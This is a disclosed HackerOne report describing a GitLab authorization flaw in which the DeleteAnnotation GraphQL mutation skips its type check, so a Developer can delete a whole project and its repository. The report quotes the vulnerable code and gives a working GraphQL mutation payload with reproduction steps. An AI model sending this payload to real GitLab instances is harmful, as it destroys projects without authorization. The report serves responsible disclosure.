Insufficient Type Check leading to Developer ability to delete Project, Repository, Group, ...
HackerOne report #960244 by ledz1996
on 2020-08-17, assigned to @dcouture:
Report | Attachments | How To Reproduce
Report
Summary
Similar bug to #858671, but this time with annotations mutation: DeleteAnnotation
in app/graphql/mutations/metrics/dashboard/annotations/base.rb
module Mutations
module Metrics
module Dashboard
module Annotations
class Base < BaseMutation
private
# This method is defined here in order to be used by `authorized_find!` in the subclasses.
def find_object(id:)
GitlabSchema.object_from_id(id)
end
end
end
end
end
end
There is no type check for find_object
in app/graphql/mutations/metrics/dashboard/annotations/delete.rb
annotation = authorized_find!(id: id)
result = ::Metrics::Dashboard::Annotations::DeleteService.new(context[:current_user], annotation).execute
And luckily, Developer is sufficient for the permission check
app/services/metrics/dashboard/annotations/delete_service.rb
Ability.allowed?(user, :delete_metrics_dashboard_annotation, annotation)
Steps to reproduce
- For User A, Create project A Private adding User B as Developer
- For User B, execute the following mutation in
http://gitlab.example.vm/-/graphql-explorer
mutation {
deleteAnnotation(input: {id: "gid://Gitlab/Project/<project-id>"}) {
clientMutationId
}
}
- Project disappear along with Repository
Removing video now that the issue is public at the request of the reporter
Results of GitLab environment info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.6.6p146
Gem Version: 2.7.10
Bundler Version:1.17.3
Rake Version: 12.3.3
Redis Version: 5.0.9
Git Version: 2.27.0
Sidekiq Version:5.2.9
Go Version: unknown
GitLab information
Version: 13.2.3-ee
Revision: 640e2695514
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 11.7
URL: http://gitlab.example.vm
HTTP Clone URL: http://gitlab.example.vm/some-group/some-project.git
SSH Clone URL: git@gitlab.example.vm:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 13.3.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Impact
Unauthorized deleting of repository/project by maintainers, developers
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
Removing video now that the issue is public at the request of the reporter
How To Reproduce
Please add reproducibility information to this section:
- See the steps to reproduce above by the reporter they are very clear